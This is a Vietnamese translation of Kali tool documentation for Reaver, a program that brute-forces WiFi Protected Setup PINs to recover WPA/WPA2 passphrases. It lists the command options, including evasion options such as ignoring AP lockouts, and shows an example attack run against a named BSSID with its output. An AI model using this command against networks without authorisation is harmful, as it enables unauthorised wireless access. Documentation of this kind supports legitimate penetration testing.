Reaver - Công cụ tấn công Wifi Protected Setup (WPS)

Giới thiệu về Reaver:

WPS cũng chỉ là một cái mật khẩu

Reaver là một công cụ tấn công kiểm tra các mạng Wifi sử dụng phương thức tấn công dò brute force mã PIN, rồi sau đó tìm ra cụm mật khẩu WPA/WPA2 đăng nhập. Bạn có thể tìm hiểu thêm về phương pháp này tại đây.
Reaver là công cụ được thiết kế như một phương pháp tấn công mạnh mẽ và thực tế đối với WPS, và đã được thử nghiệm trên một loạt các điểm truy cập triển khai WPS.
Trung bình Reaver sẽ phục hồi cụm mật khẩu WPA/WPA2 trong vòng 4-10 giờ, tùy thuộc vào AP. Trong thực tế, nó sẽ thường mất một nửa thời gian này để dò ra mã PIN WPS chính xác và khôi phục lại mật khẩu cho bạn.
Mã nguồn: https://code.google.com/p/reaver-wps/
Reaver Homepage | Kali Reaver Repo
Tác giả: Tactical Network Solutions, Craig Heffner
Giấy phép bản quyền: GPLv2

Hướng dẫn sử dụng Reaver:

Cú pháp lệnh:

[[mcode]]$ reaver -i <interface> -b <bssid> [tuỳ-chọn] [tham-số][[ecode]]

Tuỳ chọn và tham số:

Với mỗi tuỳ chọn thì sẽ đi kèm với một tham số:
* Tham số bắt buộc:
[[scode]]-i[[escode]], [[scode]]--interface=<wlan>[[escode]]: Tên interface card sử dụng, đã chuyển sang monitor-mode.
[[scode]]-b[[escode]], [[scode]]--bssid=<mac>[[escode]]: BSSID của mục tiêu.
* Tham số khác (tuỳ chọn):
[[scode]]-m[[escode]], [[scode]]--mac=<mac>[[escode]]: Địa chỉ MAC của máy.
[[scode]]-e[[escode]], [[scode]]--essid=<ssid>[[escode]]: ESSID của mục tiêu.
[[scode]]-c[[escode]], [[scode]]--channel=<channel>[[escode]]: Đặt kênh (channel) hoạt động cho card.
[[scode]]-o[[escode]], [[scode]]--out-file=<file>[[escode]]: Xuất ra một file nhật ký (log).
[[scode]]-s[[escode]], [[scode]]--session=<file>[[escode]]: Khôi phục một phiên làm việc từ một file.
[[scode]]-C[[escode]], [[scode]]--exec=<command>[[escode]]: Thực hiện lệnh <command> sau khi chạy thành công.
[[scode]]-D[[escode]], [[scode]]--daemonize[[escode]]: Chuyển sang hoạt động dạng daemon.
[[scode]]-a[[escode]], [[scode]]--auto[[escode]]: Tự động chọn các tự chọn nâng cao phù hợp với mục tiêu.
[[scode]]-f[[escode]], [[scode]]--fixed[[escode]]: Tắt channel hopping.
[[scode]]-5[[escode]], [[scode]]--5ghz[[escode]]: Dùng kênh 5GHz 802.11
[[scode]]-v[[escode]], [[scode]]--verbose[[escode]]: Hiển thị các cảnh báo không quan trọng trong quá trình hoạt động. (-vv để hiện thị nhiều hơn)
[[scode]]-q[[escode]], [[scode]]--quiet[[escode]]: Chỉ hiển thị các cảnh báo quan trọng trong quá trình hoạt động.
[[scode]]-h[[escode]], [[scode]]--help[[escode]]: Hiển thị lên terminal hướng dẫn của Reaver.
* Tham số nâng cao (tuỳ chọn):
Phần này mình xin phép không dịch, vì dịch rồi là đọc không hiểu luôn =))
[[scode]]-p[[escode]], [[scode]]--pin=<wps pin>[[escode]]: Use the specified 4 or 8 digit WPS pin
[[scode]]-d[[escode]], [[scode]]--delay=<seconds>[[escode]]: Set the delay between pin attempts [1]
[[scode]]-l[[escode]], [[scode]]--lock-delay=<seconds>[[escode]]: Set the time to wait if the AP locks WPS pin attempts [60]
[[scode]]-g[[escode]], [[scode]]--max-attempts=<num>[[escode]]: Quit after num pin attempts
[[scode]]-x[[escode]], [[scode]]--fail-wait=<seconds>[[escode]]: Set the time to sleep after 10 unexpected failures [0]
[[scode]]-r[[escode]], [[scode]]--recurring-delay=<x:y>[[escode]]: Sleep for y seconds every x pin attempts
[[scode]]-t[[escode]], [[scode]]--timeout=<seconds>[[escode]]: Set the receive timeout period [5]
[[scode]]-T[[escode]], [[scode]]--m57-timeout=<seconds>[[escode]]: Set the M5/M7 timeout period [0.20]
[[scode]]-A[[escode]], [[scode]]--no-associate[[escode]]: Do not associate with the AP (association must be done by another application)
[[scode]]-N[[escode]], [[scode]]--no-nacks[[escode]]: Do not send NACK messages when out of order packets are received
[[scode]]-S[[escode]], [[scode]]--dh-small[[escode]]: Use small DH keys to improve crack speed
[[scode]]-L[[escode]], [[scode]]--ignore-locks[[escode]]: Ignore locked state reported by the target AP
[[scode]]-E[[escode]], [[scode]]--eap-terminate[[escode]]: Terminate each WPS session with an EAP FAIL packet
[[scode]]-n[[escode]], [[scode]]--nack[[escode]]: Target AP always sends a NACK [Auto]
[[scode]]-w[[escode]], [[scode]]--win7[[escode]]: Mimic a Windows 7 registrar [False]

Ví dụ:

[[lcode]]root@kali:~# reaver -i mon0 -b E0:3F:49:6A:57:78 -v

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from E0:3F:49:6A:57:78
[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
[+] Trying pin 12345670
...[[ecode]]

Dịch từ tools.kali.org